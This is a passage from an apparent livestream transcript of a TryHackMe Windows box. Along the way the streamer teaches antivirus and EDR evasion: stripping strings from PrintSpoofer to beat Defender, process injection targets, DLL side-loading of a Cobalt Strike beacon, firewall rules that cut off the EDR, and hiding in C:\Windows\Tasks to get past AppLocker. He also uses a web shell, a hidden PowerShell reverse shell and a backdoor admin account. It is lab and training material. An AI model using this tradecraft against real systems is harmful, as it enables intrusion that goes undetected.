fucking library's name. We're not going to get into it. Point is, some executables are more irritating to do than others. I'm showing you a granular, iterative process. Okay. So, what has it found this time? Now it says create process as user failed because of a missing privilege, retrying with create process with token. Okay. So, let's look for that. Let's look for that string. We're looking. Print spoofer is not very long. It's not a very big file, thankfully. So this is actually a really good one to demonstrate. Now, if we were obfuscating Rubius, we'd want to blow our fucking brains out. Can you answer my questions? For AV bypass, what do you recommend? C++, but they're both fine. C++ and C# are both fine for AV bypass. C++ is more low level, so it's better for low level exploitation, but C# is also great. Do you think it's a good idea to include persistence in my dropper? Can you tell me what the best process to target when you're performing process injection? That depends entirely on the machine on which you're trying to perform process injection. I usually choose explorer.exe for just immediate. If I'm running in like a if we're doing process injection from like a Microsoft Office macro document, okay? The most important thing is to inject into a process that is going to be running and is going to be accessible. And one of those processes that's going to be running and accessible is explorer.exe. Now, explorer.exe has some drawbacks. You don't want to be running in explorer.exe for very long. Explorer doesn't talk to the internet ever. If a blue teamer looks at that process and sees, oh, explorer.exe is beaconing out to the internet every so often, that's weird. You don't want that. You just want to be in explorer.exe briefly, and then you want to get into another process once you have your beacon. So there's no best process. Ideally, the process that you're going to be in for the long term is going to be one that is ideally being run a lot, is in the startup folder, so it starts on startup, which is great for persistence, and it communicates with the internet. What processes are good for that? Communicates with the internet in the startup folder by default, and users tend to always have it on. Can you think? Teams! Teams is an excellent one. Teams, OneDrive, all of that stuff. All of that stuff is in the startup folder, communicates with the internet, and is on all the time, usually, unless the user kills it for some reason, but they usually don't. Those are great options. So those are the best options often to be running in. I hate Teams will not go away. Lots of corporations still use it. All right, so we found the string, I think. Create process as user failed because of a missing privilege, retrying with create process with token W. So we could just remove this string. We can just go first technique failed, trying second technique. Okay? We save it, and then we rebuild. I think the string privilege is what it might be. Yeah, absolutely, it might be. But we're just changing the whole string just to be safe. Again, if you wanted to be really safe, you could meticulously go through this whole executable and change all the strings. Which one? This one is not very hard to use that as. Do that as. Okay? So now we do this again. We do this again. We delete the old one. I have to move it to the C drive because that one has an exception. I have a lot of exceptions. This is my dev box. So there's a lot of Windows Defender exceptions here. Print spoofer. And let's just run this again. And looky there. Now, when Windows Defender scans the file, doesn't find anything. So now we've cleaned this file. It will no longer get caught by Windows Defender. Now, will this work? Will this work on any antivirus evasion? Or any antivirus? Yes, you can do this procedure against any antivirus, but you need to test against that antivirus specifically. This procedure will work against any antivirus, but you would need to test against that antivirus specifically. This particular obfuscation that we did just here was only a demonstration, and we did it against Windows Defender because that one is the most prevalent antivirus out there. Okay? I think it will not work against Sentinel-1. Why not? I didn't know it was that easy. That's nuts. Keep in mind, this only bypasses signature detection. This is only signature-based detection. There's other forms of detection out there, like heuristic detection. There is... that's like behavioral detection. There is sandboxes. There are sandboxes out there. There's antivirus has gotten much more sophisticated as time goes on. So signature detection is not the only detection that's out there these days. So this only bypasses signature detection. This will work on Windows Defender, but if you start getting into EDR, then yes, this gets much more spicy. But you'd be surprised how much antivirus is still signature-based detection at its core. So you'll bypass a lot of it just by doing this stuff. You'd need higher-end EDR, ETW tracing and stuff to be able to detect, to be able to still detect the file after this. So you're telling me AV evasion? Yeah, it's a whole AV evasion. It's its whole like different school of study, my dude. It's not a simple thing. It's far, far from a simple thing. Can you show us how to evade EDR detection in the future? So when it comes down to EDR detection, again, ideally, you'll be able to test against the specific EDR in a sandbox. Like, you'll be able to set up the EDR that you're trying to test against in a sandbox and try different things until whatever you try gets past it. There is no hard and fast way to get past every EDR out there. Every EDR detects on different things. For example, since we're talking about Windows Defender, let's talk about the souped-up version of Windows Defender. Windows Defender for Endpoint. That's one of the most common antivirus. That's one of the most common endpoint protections that I see. Windows Defender for Endpoint. And it is wily. It's real good. Windows Defender for Endpoint is very, very wily. Some things that Windows Defender for Endpoint hates is PowerShell. Windows Defender for Endpoint hates PowerShell. It hates it unmanaged. It hates it in PowerShell.exe. Hates PowerShell in general. It will flag, even if you obfuscate the PowerShell, it'll still produce a bunch of alerts. It'll flag on the obfuscation itself and say, whole bunch of obfuscated shit is being run. Real sus, bro. Sussy wussy. Don't want that. So you want to avoid PowerShell against Windows Defender for Endpoint for sure. But Windows Defender for Endpoint also hates signed executables. Or it hates unsigned executables, I should say. It hates executables that have not been signed. It hates them. It will scrutinize them much more heavily. However, Windows Defender for Endpoint does have a blind spot for signed executables, especially Microsoft signed executables. If you can get your payload running in the context of a signed Microsoft executable, Windows Defender for Endpoint becomes much less competent at catching you. So this is where things like even doing a simple run DLL32.exe goes a long way. Like generating a DLL, like it'd have to be modified. You'd have to modify the DLL. It will flag on the default Cobalt Strike DLL. But if you modify the default Cobalt Strike DLL and then feed it to run DLL32.exe, that'll bypass Windows Defender for Endpoint. That'll actually do it. You can also do DLL side loading, like Uberbit is mentioning. DLL side loading is another very common way to evade antivirus these days. DLL side loading is really sneaky, real sneaky, and it also has persistence built in if you choose the right process to do it to. So that's nice. You can also do things like if you have system level access to the machine that on which you're trying to evade antivirus, you can actually make firewall rules to keep the endpoint protection from talking to its central server. You can do NetSH ADV firewall rules to block Windows Defender for Endpoint from talking to its server. That's pretty sneaky as well. Can you explain DLL side loading? Yeah, so DLL side loading is when you generate a malicious DLL. And DLL side loading, you might wonder how it's different from DLL hijacking, and the short answer is it's not. They're basically the same technique, okay? DLL hijacking and DLL side loading are essentially the same technique. Essentially what you're doing is, whenever you execute a program in Windows, okay, let's say you're executing a program in Windows. If your system, can't you just disable it? No, not with EDR. A lot of times EDR cannot even be disabled by system. You have to literally log in as a domain admin and disable it. Or it can only be disabled by its central server. So someone would have to log into Windows Defender for Endpoint's dashboard and disable it there. Yeah, Falcon is the same way. CrowdStrike Falcon is another one of the most common ones that I see, and it's really fucking wily. CrowdStrike Falcon is another one of the nastier ones. Some things that CrowdStrike Falcon hates. It hates brute forcing. It will detect on you trying to brute force stuff. It also detects process injection. It really hates process injection. So don't inject. Don't do any injection. It also hates fork and run. Don't do fork and run. Real bad. It doesn't like that. So DLL side loading. So what's DLL hijacking? DLL hijacking is placing a malicious DLL. When you run an executable in Windows, executables need shared libraries to run. They use DLLs to run. DLLs, dynamic linked libraries, are the equivalent of Linux's shared object libraries, where they contain functions that are designed to be run by other applications on the machine. So if a machine needs to use, for example, virtual alloc X. Let's say a machine needs to use virtual alloc or virtual alloc X. It needs to load kernel 32. I think virtual alloc and virtual alloc X are both located in kernel32.dll. Okay, so it needs to load kernel 32 in order to use those functions. Does that make sense? But Windows doesn't have. It actually does, but nobody enables it. People have there's functionality in Windows called whitelisted DLLs, but nobody uses it because it breaks everything. Essentially, these programs, when you start them up, don't know where to find the DLLs immediately. There's a search order, much like we talked about with the unquoted service path earlier in this very stream. There is a DLL search order. Well, it will search in a certain directory first, and then another directory. It's going to look in a bunch of directories looking for the DLL with the proper name. Looking for a DLL with the name that it's looking for. Like if it's kernel 32, it's kernel 30, then it's kernel 32.dll it's looking for. And where do you think the first place it looks is? Where do you think the first place Windows looks for a DLL being loaded by the executable? Where do you think it looks? The current directory. Yeah. It looks in the applications directory. So Teams, for example, Teams uses, I think it's ntcrypt.dll, has an ntcrypt.dll that it's loading from system32. But it won't look in system32 first. Instead, it'll look in its current working directory for a DLL called ntdll32, or ntcrypt first. And if it finds it, it'll load that DLL first. And if you put a malicious DLL there, it'll load the malicious DLL instead. Now, the astute among you will ask, well, Al, won't that break Teams? Because it's not getting a DLL that it needs to run. And you're absolutely right. It does break Teams. Unless you are smart and thought of that, and you can actually link your malicious DLL to the original and say, hey, if you're calling any one of these functions are all in the other DLL. You're going to want to go over to this other DLL for those functions. But while I've got you here, just go ahead and run this DLL main for me, which is totally not doing anything malicious. That's essentially what you're doing. You can link it so Teams will still run normally, but it'll also generate a Cobalt Strike beacon for you. And the nice thing about this is it's also persistence. That DLL also works for persistence. As in, every time the machine boots or Teams starts up, that DLL will run. Does that make sense? We're talking about complex stuff here. This is complex stuff. I'm trying to explain it at a high level. Does that make sense to everybody? Okay, let's finish up the box while we're sitting here. We still haven't finished the box yet. Let's go ahead and just print spoofer this sumbitch and get it done with. And then we'll look to see if we can figure out the way it's supposed to be done. What's the easiest way? The easiest way is probably just to make a... Let's just do net user alhazred add net local groups administrator alhazred add. I do need a password. Okay. Let's do that. I hope the box didn't die on me. Did the box die on me? Please don't die on me. Nope. Should not be dead. Hopefully it is not dead. Nope, it should still be running. Did we lose our shell for some reason? It is possible we have lost our shell while we were doing that long-winded explanation. I'm not super familiar with how Windows machines work. Yeah, super interesting to look into. Windows is the majority of the market share, so it is the hot topic for exploitation. It looks like we have killed our shell somehow. So let's go ahead and just get a new one. This should work just fine, I would think. Feel free to ask questions in the chat. Like, it doesn't have to be about the box. I know we just talked about a lot of stuff just there. Is the box, like, down or something? It is not responding to anything, is it? The box may just be down. Maybe the box actually did go down. Well, darn it. We're gonna finish it. We might have to restart the... reset the box here. Because the box is not responding. Hello? Anybody there? The box didn't time out. We still had another 20 minutes. Yeah, and let's just reset the box here. We'll reset the box. Sorry about that, guys. It shouldn't take very long to get back to where we were. I'm not sure what happened to the box there, but... Okay. Start the machine up again. VPN dead? Oh, actually, it might be. Did our VPN die? I didn't even check that. It looks like it did die. It looks like our VPN did, in fact, die. Alright, well, it shouldn't take very long. Yeah, Limelighter is a useful tool. I use Limelighter too. Limelighter generates fake certificates. I wouldn't use a fake certificate for Microsoft, but fake certificates for like Google or FireEye, stuff like that. Fake certificates for other stuff that's not Microsoft. Deeply, I do not recommend on a Microsoft Windows machine with Windows Defender or Windows Defender for Endpoint running, trying to evade antivirus by signing your executables with a fake Microsoft certificate. That is not advised. You definitely don't. Yeah, definitely keep it to third party. Yeah, Microsoft knows its own certificate, believe it or not. So you're not going to want to spoof Microsoft's certificate. I do not recommend that. All right. Well, the box is booting up again. Let's do Stream Raiders really quick. What's the code for the PHP web shell you uploaded? I can show you that really quickly. Very, very simple. It's only a couple of lines. Cthulhu.php. Obviously, it doesn't need to be named Cthulhu.php. That's just what I tend to call my malicious stuff. My goal is to have Windows Defender eventually flagging on the string Cthulhu. I would take a weird sort of pleasure in that if I alone got Windows Defender flagging on the string Cthulhu. All right, we're moving on. Box should be back up now. All right, let me get caught up on these. Oh, we have a lot of follows. Anthony J.A. with the 100 Tiggle biddies. Thank you so much. Coco Loco Poco Popo with the 18 months of dedicated cult idolatry. Welcome back to the All Has Red team, my friend. Thanks for supporting the stream. 0 Day, Sorcerer, Insufficient, Osprey, Hollow the Silver, Dogwall NSK, Pamper Carrot, White, and Dervim. Thank you for the follows. Cthulhu Fountain. To all of you. Fountain. Yeah, you have to do like a guttural. You have to do like a... It's like a... Yeah. How did you learn AV evasion? The same way I learn anything else, just by tinkering with stuff. I learned that technique that I just showed you from the old OSCE, actually. Way back in like 2019, I took OSCE, Offensive Security Certified Expert. That cert no longer exists. Well, it does exist, but it's more of a combination of 3 certs. Before, it was just 1 cert, and it wasn't as good. But passing the OSCE required you to know that technique. Notice the way that I phrased that. I said passing the OSCE required you to know that technique. I did not say that the OSCE, the old OSCE, taught you that technique. Those are 2 entirely different things. Offensive security in the old days was really just like, Google, you fucking idiot. Like, they would just give you challenges and you just be like, and with basically no instruction. and you'd just be like Googling stuff. Do you recommend the new OSCE? Yes. The new OSCE is OSEP, OSED, and OSWE. That's 3 certifications. And if you get all of those certifications, they award you the the new OSCE with a certificate and everything. You're paying $1K and the course is not enough to pass? Dude, the old OSCE was fucking wild. Offensive security in the old days was fucking wild, my dude. It was, like, literally try harder was their entire motto. Like, it wasn't just their motto. That was just what you did. Like, you got, like, you had a PDF. There was, like, a 50-page PDF, and you did learn stuff from it. But there were techniques that you did not learn from the course that are required to pass the course. Which I thought was kind of bullshit. These days, they've reformed on that for the most part. These days, they are actually teaching you things. Go figure. So we get the bad cert domain because of burp. Burp is man-in-the-middling our SSL traffic. Okay. We're uploading, so we got to do SMB client. That, and then it was images $. Tac U, capital U for guest, with no password. Reformed like Tyler 1. Yes, I mean, it's reformed more than Tyler 1. Okay. Put Cthulhu.php. Okay. So if we go back to images, we see Cthulhu.php is there. We can paste the IP address in here, and I think it should work just fine, because we don't have, like, a session or anything. And we can do... We have our listener. We send. Hopefully that'll work. I think it should. Tyler 1 is as fun as it gets. Oh, no, he gets great viewership because his content is fantastic. I'm not trying to say Tyler 1 is bad. What's the difference between OSCP lab access versus proving grounds? The actual lab machines will be more similar to what you'll see on the exam. This may not work, actually. Changing the host probably didn't just changing the host probably didn't work, unfortunately. That's okay. Let's send this to repeater. We can just paste it into a new request. Change request method. And then we can go to the other request in repeater, and we can just copy out the entire CMD parameter. It shouldn't need to be changed at all. We have the same IP address, don't we? Yes. Okay. We send. Now we should get a callback, I think. Some of the Proving Grounds machines are wild. I mean, I only have Proving Grounds play. OffSec won't let me. So far has said that I can't do that. They would rather I not do Proving Grounds practice on stream. I would like to. So if they change their mind on that, I would be happy to hear that. But all right, so we're back in. Let's do print spoofer really fast. We've seen that we do have code execution through print spoofer. And that, as always, is because of... we'll do whoami/priv. That's because of this SE impersonate privilege. We also do see we have shutdown privilege as well. But it's actually disabled. We had shutdown privilege on the previous machine. But the SE impersonate privilege is what allows print spoofer to work. Go back to the desktop. You probably don't want to just be dropping random files on people's desktops. That's probably not the best for stealth. But this is a CTF. I don't really care. ps64.exe. Oh, I forgot I have to... tac O ps64.exe. Okay. And now we execute ps64.exe tac C, and we can try pinging again. 10.13.10.69. Nice, the sex number. sudo tcp dump to make sure we get those pings. Thankfully, print spoofer is more tolerant than juicy potato. And there's our print spoofer. Where do you usually drop them? I usually, like, on real targets, I'll usually drop them in C Windows tasks. And if anyone could tell me why that is, I would be impressed. Why do you think I choose C Windows tasks specifically? There's a number of places that I could pick, but tasks tends to be world writable. But why would I pick that area? Inside of the Windows C folder, Windows folder. It's not just that everybody can write there, although that definitely is a big reason. Temp gets cleaned out, yeah, but why else? AV evasion. Think about, there's other defensive measures other than antivirus. But you're on the right track. You're on the right track. It's not AV evasion. I'm evading something else. There's another defensive measure that I would be evading by throwing an app locker. App locker. By default, Windows' app locker is a file whitelisting feature in Windows. It allows you to whitelist certain executables to allow users to run just those executables. And if a file is not whitelisted, it will not execute. AppLocker will block it. But AppLocker has exceptions. By default, everything inside of the C Windows folder is an exception. Everything inside of the Windows folder is excluded from AppLocker. Everything in the Windows folder will run. And the C Windows tasks folder is inside of the Windows folder and also tends to be world writable. So that's where I tend to put my stuff. How do you stop antivirus from removing my notes? I have an exception in Windows Defender for where my notes are, but it still causes a problem. Okay, let's do this again. Let's do SC impersonate privilege, and let me just copy the command I ran earlier. Oh, god damn it. Well, hopefully that won't work. That won't matter. Okay. Okay, so let's execute that. Okay, let's do net user now. That unfortunately does not seem to have worked. If I need to do, I need to do cmd/c or something. We can put like cmd/c in front of here. It seems like it errored out. Let's just do these separately. There's no reason we have to execute both commands immediately. Okay, net user. Still didn't work. I can't imagine this. Can you just drop a system shell? Yeah, you could, but well, let's see if Windows Defender is running. If msmp-eng.exe is listening. If it is, then Windows Defender is active. I mean, we do see this. It doesn't mean that real-time monitoring is set to on. It may or may not be set to on. But we do see msmp-eng, so it's not disabled. Huh. My command might be wrong. Let's try removing that. So that one took a little longer. We still don't get it. Huh. Well, I guess we can just try to upload. We could try the PowerShell reverse shell again. I guess that makes the most sense, right? Let's just take... Let's un-URL encode this. Control-Shift-U. Actually, I'm going to need to listen on a different port, so I'm going to have to regenerate it. Cat Cthulhu.ps1. Kate Cthulhu.ps1. .69. Let's change it to 8444 instead of 8443. And then we'll do iConvert. Where is my folder? Or where's my notes? There it is. Cthulhu.ps1. Okay. We can pipe that into base 64, attack W0, so it doesn't put new lines in it. There we go. And now we can execute it. We'll see if this works. Netcat tech NLVP 8444. We'll do RL wrap again as well. Okay. Back to home. So this is TAC E. PowerShell.exe. NOP, TAC exec. Bypass. TAC W hidden. Okay, let's see if that executes. If that doesn't work, we can try netcat. It might just be hanging for a second. And the command looks right. Maybe password limit. Oh, that actually might be it. It might be. We've run into that before, actually. That actually 100% might be right, Ragev. That might unironically be correct. Unfortunately, this is just hanging now. I don't know. We're not getting a callback, and it's just sort of hanging. Ten 13 10 6 9 8 4 4 4. Okay. Atomova Visela and the Cyberpunker. Thank you for the follows. What is happening now? I don't know whether to keep waiting or just assume it's busted. Come on. Well, I guess we'll just kill it. We need to control U this again.
A hunter must hunt.
Hitokiri B, thank you so much for the 6 months of Prime. Welcome back to the All Has Red team. I see you are a man of culture as well, based on your name. Still nothing there, huh? Is the box didn't die on me, did it? Did my VPN die on me again? Nope, doesn't look like it. Come on. It's the right IP address. Come on, dude. What? How are we just hanging here now? Come on. Are we gonna fucking do anything, or what's going on here? But the box just isn't responding now. Is the box fucking dead again? Come on, dude. What? Is the box just fucking dead now? I think this is just cached. The box is just fucking dead again. God damn it. Oh, now it's responding. It just takes 400 hours. Let's make sure we can execute commands. Come on. This is fucking rough. Like, this is a who am I command. And we are just sitting here. Dude, don't make me go all the way through this again. Come on. Clarksoft, welcome, my friend. Oh my god, this is unacceptable. What is going on? Like, okay, I guess we're stopping it. Fromaster! I don't want to mold at you, I want to mold at the machine! Don't make me yell at you as well! See, do you see what you've just done, Fromaster? Do you see what you've just done? Okay, now you've killed all of the vibe in here. You've killed the whole fucking vibe in here. Now it's like mommy hit daddy at the dinner table, and we're all still trying to eat still. The vibe is just dead now. The vibe is dead. This is what happens when you make me yell. Okay? The vibe is alive, is it? Clandestine Wolf, I will yell at you as well, and don't you think I won't? Okay? I would never hit your mother. She does such great things for me. Nondescript things for me already. Okay? So don't even try. Oh my god, if I have to wait for this fucking box to hang for any, like, I've reset the box, by the way. I've reset the box. I'm waiting again for it to restart for the third time. I am tired of waiting on this box to start up. It's 136.136 now. Well, this box is proving very irritating, chat. It just will not... It doesn't stay working for very long. It just dies. I don't know what to say. I don't know why it's dying. It just will stop responding to anything. Come on, dude. Fuck. I just want this over with. Like, I'm so tired of this little fucking back and forth thing and no loading. Yeah, we had to reset the box again, so we're gonna have to do this yet again. I had to reset the box for the 40th time. Come on. Come on, box. Let's go. The box takes 5 minutes to start up every time it starts, too. I guess we'll do Stream Raiders really quick while we wait. Ryu 404. It's a good time for your first chat there. We can check to see if the VPN appears to still work. I'll kill it and restart it just to be safe. Okay. We are still waiting. The box has been reset for 4 minutes now, and it is still not responding to anything. Goody. At least we're winning in Stream Raiders, right? That's what's important. Okay, can I interact with the box now? Is the box up for the third fucking time? Please, can the box respond? Oh my god, we are still waiting. Holy fucking shit, dude. Are you kidding me? The box has been up for 5 minutes and it is still not responding. Okay. Images. Cthulhu.php. Splendid. For the millionth time. Send to repeater. Change request method. Okay. Well, let's see if it works now. We'll try print spoofer one more time. I guess I can't risk it trying to give a reverse shell because it'll just, I'm afraid the box will just crash on me again. The password I gave might indeed be too long. I've run into that before. Come on. Like, Jesus. Any time here. Oh my god, I have never waited so long for anything in my entire life, except for that one box that had a priv-esc on a scheduled task that ran every 5 fucking minutes. That was worse. That was definitely worse. At least we're getting... Alright, let's try print spoofer one more time here. Dude, are you fucking kidding? What, like, how many, like, does this thing have, like, half of a thread in its CPU? Is that how much TryHackMe is giving it? Like, seriously, half of a thread, I feel like. Jesus. Any recommendation for H.P. Lovecraft literature to start with? Call of Cthulhu is a good one to start with. Call of Cthulhu, Call of Cthulhu and the Shadow over Innsmouth are the best ones to start with, I would argue. Those are some of his best works and some of his most well-known, and some of the most commonly adapted as well. My personal favorite is At the Mountains of Madness. I also quite like the Dunwich Horror. The Dunwich Horror is another good one. At the Mountains of Madness is a little bit long and ponderous, though, so it might not strike your fancy if you're still new to his writing style. Just got God level. Hey, congratulations, Jafaste. Oh my god, I swear. Everything takes 5 hours with this box. This is insane. At any point, I would love it if the box would just talk. This is crazy how long everything takes. This is nutty. Come on. I know there's something in the desktop. Let's go. There we go. We finally figured it out. Okay. PS64.exe. Taxi, net, user, Alhazred, Cthulhu, 1, 2, 3. Add. See if that works. How long is this password? 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11. I think that should be short enough. Mr. Streamer's opinion on what? What am I giving my opinion on? Operation failed or timed out. That's new. What am I giving my opinion on? What is this? We're hacking. We're trying to hack into this machine. We're legally hacking into a machine, stealthy. But now it's not even fucking executing. Come on now. What the hell? Come on. Now We're being frustrated, which is what hacking is. Hacking is frustration. Hacking is pain. Okay? Hacking is pain. I don't know why now Prince Spoofer is suddenly failing. Let's just try hack me for you. My God, this is annoying.
What are you doing, step bro?
What am I doing wrong? Oh, that time it worked. But we did not get any pings. We did not get any pings.
Hey, listen.
What? Fantasy. On learning multiple things at once or just focusing on one thing at a time? I would say one thing at a time. Just the important thing is to make sure you're always learning. Don't worry so much about what you're learning or if you're learning a lot of things all at once or only a little or only one thing at once. Just focus on always learning, okay? Shadow, you're telling me to stop molding now too? Why? We just went over this. It kills the vibe in here if you make me yell at you. Stop making me yell at you. Well, we finally got pings. It just took like 900 hours. It just takes like literally 900,000 hours for the box to respond because the box is just that slow. Let's try this one more time. CMD/C. Okay. Come on. Please have worked. Yes! Yes! So whoever said that the password was too long, you were absolutely right. We've run into that before, and I always forget about it. Thank you. But our user finally added. Hooray. Hooray, we did it. So we have run an exploit on this machine, and we have successfully added a new user to it. Now we add ourselves to we add our new user to the administrators group. And then we net local group administrators. Now we should be in the administrators. We are! Hooray! We're there, boys. We've done it. All right. Hooray. So now let's do X free RDP. (136.136). User is Alhazred, and the password is Cthulhu123, I think. Like that. If this doesn't work, we can use crackmap exec. The box is incredibly slow, so I would expect myself to be actually old by the time this RDP session starts up. Stealthy, thanks for the follow, and Birch Boy, thank you for the follow as well. We're waiting for RDP to begin. It appears to have worked. The authentication appears to have gone through. The worst password policy. By default, Windows does do that, Matthias. The 14 limit is the default. Yeah. I just always forget about it. And once again, we are here waiting for around 9 or 10 hours for this box to do the most basic stuff. The overweight hamster that TryHackMe has gotten for this box, other than a processor, instead of a processor, TryHackMe is now running its virtual machines on overweight hamsters, and that guy is taking a little bit to actually get going here. Which offensive cert do you guys consider to be close to OSCP in terms of industry recognition for people that can't afford it? Well, OSCP is really the cheapest cert on the market that's going to have the industry recognition that OSCP has. If you want something cheaper, go for like EJPT, which is cheaper, and PNPT. But PNPT does not have the industry recognition yet. It's starting to catch some steam, but it's taking a little while. Oh my god, this hamster? This hamster is probably having a heart attack. This is ridiculous. I don't know whether to just try CrackMap Exec. Let's just try CrackMap Exec in a different pane. Uh, 10, 136, 136. Attack P. Cthulhu 123. Oh my god. Why is everything so slow? Like, this one... Do I have the right IP address? Yeah. Why is the box just not responding? Didn't the password you can put... No, I took the password off... I took the exclamation point off the end. Oh, we still have... The box is still talking to our shell. But it appears that free RDP just fucking failed. I don't know why CrackMap Exec is failing now, too. It didn't respond. Now it does. It does not say pwned, interestingly. But I think we had trouble... That CrackMap Exec had trouble accessing the shares, and I think the way it determines if it's pwned is by, You could try Evil WinRM. We do not have admin dollar permissions? We're in the administrator group. Right here. We are in the administrator... Okay. Let's try attack X. Let's try to execute a command. CrackMap Exec is not saying we have access to admin dollar, which is weird, given that we're an administrator. And it did not execute. Holy fucking shit, dude. This box is so fucking slow. Let's try mounting the $C share. Maybe we can access that. I don't know why. We're in the administrator group. Wow. I don't know why it's doing this. It will not let me... It will not... We are administrator, and yet we cannot access the box. This is very strange. Very, very strange. All right, let's just see what the intended path is. Because this has been just going on too long, and I'm tired of wrestling with this thing. Find the passwords and admin flag. What is the user's password? I never saw the user's password, I don't think. Did we ever see a user's password, chat? I don't really want to run Win Peace. It's going to take forever.
Listen.
I don't really want to run Win Peace. It's going to take forever. All right, just tell me. Users automatically logged onto the computer. All right. Where are auto log on? Is auto log on in registry? Okay, what's the registry key? Okay. It's gonna be reg query. Hopefully this runs in PowerShell. So we query that registry key. Again, I'm just doing this fast just because I don't know why this box is behaving this way. And I'm tired. I'm afraid the box is going to go down again. I'm honestly terrified that the box is going to go back down again. So I want to get through this box before it goes back down. Because it's died on us twice already. And it may have died on us just now, like, because it's not replying to us. If it died on us again, I'm afraid we're not going to be able to get through it. Like, this box is far too unstable. I don't know why it's so unstable. This is nutty. God, is the box really down for a third time? Are you kidding me? This is unacceptable. This is nuts. I am now experiencing unresponsive box. Dude, this thing is just... This box is so unstable. It's insane. This is such a fascinating craft, yet I get such migraines thinking about it. That's everybody who's in the field, my dude. It's just a difficult... It's just difficult. And yeah, you do have to dedicate a lot of time getting good at it. You have to get good. I have had problems like this on the weekends. Well, I'm sorry, guys. Like, the box is just like... We did get administrator. Can we count this as administrator? Like, it finally responded. Or at least we got our prompt back. But it might be just dead. The box might be just dead. It just didn't reply to our reg query either. Maybe reg query might not work in PowerShell. We're inside PowerShell right now. So we might want to do cmd/c. Let's see if this command executes first. This is an intolerably slow box. It is nutty how slow this box is. I'm trying to execute a who am I command, and the box has now been hanging for 10 seconds. Just do... Yeah, we did that. We did that, the morph. We can't see the output, though. I can't see the output to get the flag. And it doesn't really seem to matter because the box seems to just be down. Do you have any other? No, I just have the one VPN session. The VPN is up. It's working. Just the box is so unstable that it keeps going down. Well, we'll give this a little bit longer, but I don't think we're going to be able to finish this, guys. This is intolerable. I can't keep doing this. It is obnoxious how slow this is. Oh my god, it finally responded. A miracle has occurred. I can't be waiting fucking literally over a minute for a who am I command. I can't. We tried to RDP in, but it seemed to time out. RDP seemed to time out. The box is far too slow to handle RDP. Yeah, the bot's still there. Yeah, I know I can execute code as system. Like, we just, it takes far too long. I think we're just going to have to call it, my man. I think we're just going to have to call it. I can't even execute a reg query. Like, we're not even getting the output. It just takes too long. Like, it took us over a minute to get a who am I command. This is just intolerably slow. We'll try it one more time. I'll put it in quotes, I guess. But this is insane how long it takes just to respond. I'm not doing this. Can you bring up Task Manager? No, I have a command prompt. I don't know why it's so slow. Like, again, TryHackMe appears to be running this box on an overweight gerbil on a wheel. This is fucking nutty. Like, we executed one command. It takes like 15 fucking hours. Buddy, it's gonna take us literally an hour to even see the task man, to even see the running processes. And can any of these processes really be considered running? That's the question. How slow can a process be before it's not running anymore? There's a philosophical question for you right there. Can this box really be considered to be running? Zombies are faster than this. Like, and I'm not talking like the 28 days later zombies. I'm talking like the old school Dawn of the Dead zombies. Okay? Yeah, 1 instruction per second. Exactly. And we can't even see the output. I can't even see the output of this command. Like, for some reason, we're not getting the output. And I don't know if it's because the box just can't handle the craziness of a reg query command. Maybe I'm executing something wrong. Let's try $error. Owen Codes bringing the developer into the cult. Welcome, the developer. Good to have you.
A hunter must hunt.
You can't read, dude. No, I can't do anything. Like, do you see what I can do on this box? I can't do anything. The box doesn't respond to anything. Like, it's so slow, and it doesn't seem to respond to any. I've tried executing this reg query 4 different times, and it has not worked. I can't get basic command output. We're still waiting, by the way. We just want to see the contents of the error variable. I don't know. I think we're going to call it here, guys. This is far too slow. I'm not going to sit here and wait 5 minutes between each command and have it not even return the output. This is completely insane. How horrible this is. ZM00, I cannot see the output of that command. Like, I feel like we're in another netstat thing. Print spoofer does not allow you to see the output. Yeah, Print Spoofer does work. We have administrator on the box. We made an administrative user. But the box is so slow that we cannot execute the prerequisite commands to actually get the flag. Yeah, we're done. This is it. Like, I'm not sitting here for any longer to wait for this box to respond. This is intolerable, TryHackMe. TryHackMe, if you're listening, this is absolutely fucking intolerable. Like, this cannot be tolerated. This is insane. How long this box takes to simply respond is absolutely fucking nuts. How long this takes. It is giving errors that because we didn't put quotes around this. We'll try that. This is just intolerable. This is not even playable. Let's do some Q&A. Yeah, feel free to answer questions. If you want to answer, like, we might as well. Ask me questions. Ask me questions. What questions do you guys have? Oh my god, did we get output? Holy fucking shit, we got some output. It looks like we have a password here. Holy fucking shit, we got output. How long are your legs? I don't know, never measured them. What is the administrator's password? I don't know, this? No. Is there an administrator password somewhere? It's not Cthulhu 123. It's going to be long like this one is. Well, I guess we can let's just start by looking at C. It doesn't give us a hint on this one. I'm just following the hints. This one doesn't give me a hint, so I'll just start looking in the $C share. Oh my god, it got back to me in less than fucking 4 hours. Maybe the box is speeding up now? Oh no, dir was too much. Dir was too much. What encryption is it's not encrypted, it's just a password. This is just the plain text password. WinPeas would have found this. Installs? That's not a normal folder. A lot of times, if you check $C, you can find folders that look weird. XAMPP is the PHP web server. These are all normal except for installs. inetpub is also web server stuff. We have, this is the VNC. We actually saw PNC. Cat startup, what's the type startup.bat? We actually saw VNC running when we did the nmap scan. psexec.exe, classic. Simple slide. Nothing. Let's try simple slide. It's a directory. Looks like we don't have permissions. Install guide. Oh, there's this other batch file here. Just trying to get through this before the box goes down again. psexec, accept EULA. Oh, we just have clear. So, how often do you think this happens, chat? I know you're like, Mr. Streamer, surely people don't just leave their passwords sitting around in batch scripts on their servers. Dude, this is one of the most common fucking things I see in the security industry. This is literally widespread on a massive scale. We look like when I'm red teaming, we look for batch scripts, we look for PowerShell scripts, and we're specifically looking for shit just like this. Credentials just sitting in files. This is absolutely widespread. It's huge. This happens all the fucking time.
A hunter must hunt.
A fine addition to my collection.
That password will indeed make a fine addition to my collection. What executable is used to run the installer with the administrator? It's psexec. Yep, psexec. What is the VNC password? Is there a password here somewhere? All right, what's the hint? Okay, the version here is known to work. What the fuck do you even mean? I just want to get through this. I have to get through this where the box goes down again. What is there like? There's an encrypted VNC password, so we have to extract an encrypted VNC password somewhere, and then decrypt it. It's probably in the INI file that's referenced. Oh, it works from the command line. Maybe we can just upload this to the box and run it. We already routed the box through, to be clear, we already routed the box through print spoofer. So this is all just bonus. You guys are welcome. Okay, VNC password. I'm just gonna, I've never run this. VNC pwd.exe. Let's just try executing this. I just don't want the box to go down again. Oh my god. And also, it's excruciating how long it takes it to respond to simple commands. Okay. Just try executing it, I guess. In the INI file that's referenced. Where is it referenced? In this batch script somewhere? Oh, ultravnc.ini. Yep. That would make sense. Come on. Oh my god. This is absolutely intolerable. Like TryHackMe needs to fix this. This is absolutely insane how long this takes. Is there attack H, I'm wondering? I don't know how to use this program. Was it 